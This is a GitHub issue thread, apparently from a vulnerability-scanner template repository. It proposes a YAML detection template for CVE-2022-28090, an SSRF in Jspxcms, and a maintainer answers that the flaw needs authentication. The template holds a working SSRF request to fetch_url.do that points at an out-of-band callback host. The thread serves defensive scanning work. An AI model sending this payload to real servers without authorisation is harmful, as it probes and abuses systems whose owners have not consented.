CVE-2022-28090

Question

CVE-2022-28090

akincibor opened this issue 2 years ago · comments

id: CVE-2022-28090

info:
  name: Jspxcms < 10.2.0 - Unauthenticated SSRF
  author: Akincibor
  severity: high
  description: Jspxcms v10.2.0 allows attackers to execute a Server-Side Request Forgery (SSRF) via /cmscp/ext/collect/fetch_url.do?url=.
  reference:
    - https://gitee.com/jspxcms/Jspxcms/issues/I4ZKDR
  tags: ssrf,cve,cve2022

requests:
  - method: GET
    path:
      - '{{BaseURL}}/cmscp/ext/collect/fetch_url.do?url=https://{{interactsh-url}}/'

    matchers:
      - type: word
        part: interactsh_protocol # Confirms the HTTP Interaction
        words:
          - "http"

Prince Chaddha · Answer 1 · Tue May 24 2022 16:00:39 GMT+0800 (China Standard Time)

Hello @akincibor, thank you so much for sharing this template with the community and contributing to this project 🍻

As mentioned in the reference here, this is an authenticated issue.

When not logged in, the access trigger point will jump to the login page

Prince Chaddha · Answer 2 · Mon Apr 17 2023 11:33:31 GMT+0800 (China Standard Time)

Hello @akincibor, thank you so much for sharing this template with the community and contributing to this project 🍻
Since there has been no activity on this issue, I am closing it. However, please feel free to open a new issue for this CVE if you have more details.